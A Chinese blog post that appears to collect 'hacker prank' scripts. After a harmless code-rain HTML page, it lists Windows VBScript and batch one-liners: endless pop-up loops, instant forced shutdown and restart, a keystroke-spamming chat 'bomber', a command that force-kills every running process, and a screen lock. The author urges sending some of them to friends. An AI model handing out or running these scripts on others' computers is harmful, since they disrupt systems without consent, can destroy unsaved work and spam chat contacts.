首页IT科技黑客恶搞软件(恶搞黑客小程序小病毒大全)

黑客恶搞软件(恶搞黑客小程序小病毒大全)

时间2025-06-14 11:57:33分类IT科技浏览5312
导读:<!DOCTYPE html> <html...

<!DOCTYPE html> <html lang="en"> <head>     <meta charset="UTF-8">     <title>Code</title>     <style>         body{             margin: 0;             overflow: hidden;         }     </style> </head> <body> <canvas id="myCanvas"></canvas> <script>     const width = document.getElementById("myCanvas").width = screen.availWidth;     const height = document.getElementById("myCanvas").height = screen.availHeight;     const ctx = document.getElementById("myCanvas").getContext("2d");     const arr = Array(Math.ceil(width / 10)).fill(0);     const str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".split(""); function rain() {     ctx.fillStyle = "rgba(0,0,0,0.05)";     ctx.fillRect(0, 0, width, height);     ctx.fillStyle = "#0f0";     arr.forEach(function (value, index) {         ctx.fillText(str[Math.floor(Math.random() * str.length)], index * 10, value + 10);         arr[index] = value >= height || value > 8888 * Math.random() ? 0 : value + 10;     }); } setInterval(rain, 30); </script> </body> </html>

黑客代码雨              ,文本文档写                     ,后缀html

do msgbox"hahaha!" loop

弹窗病毒       ,文本文档写       ,后缀vbs

shutdown -s -t 0

关机代码                     ,文本文档写              ,后缀bat

set WshShell=WScript.CreateObject("Wscript.Shell") WshShell.AppActivate"Clow" for i=1 to 100 WScript.sleep 100 Wshshell.Sendkeys"^v" Wshshell.Sendkeys i Wshshell.Sendkeys"%s" Next

轰炸       ,文本文档写                     ,后缀vbs.可以发在微信上              ,剪切要发内容后双击

text() function text dim a a=InputBox("叫爸爸!") if a="爸爸"then Msgbox"儿子真乖!",0,"恭喜" else MsgBox"调皮,不叫爸爸还想跑?",0,"再来一次! " text() end if end function

叫爸爸                     ,文本文档写                     ,后缀vbs.可以发给你的损友              。

Taskkill/fi "pid ge 1"/f

蓝屏代码,文本文档写              ,后缀bat                     。建议别轻易触碰!有点费电脑

rundll32.exe user32.dll,LockWorkStation:p

锁定                     ,文本文档写       ,后缀bat       。

shutdown.exe -r -c"立即重启"-t 0

重启              ,文本文档写                     ,后缀bat       。

在下收集和自创的黑客小程序大全       ,望各位笑纳       ,想要其他黑客小程序                     ,信息学奥赛一本通答案              ,c++基础的       ,关注我                     。跪求点赞                     ,收藏              。

创心域SEO版权声明:以上内容作者已申请原创保护,未经允许不得转载,侵权必究!授权事宜、对本内容有异议或投诉,敬请联系网站管理员,我们将尽快回复您,谢谢合作!

展开全文READ MORE
vue部署到springboot中(vue3+springboot部署到Windows服务器的详细步骤) iframe vh(iframe内嵌链接常见问题)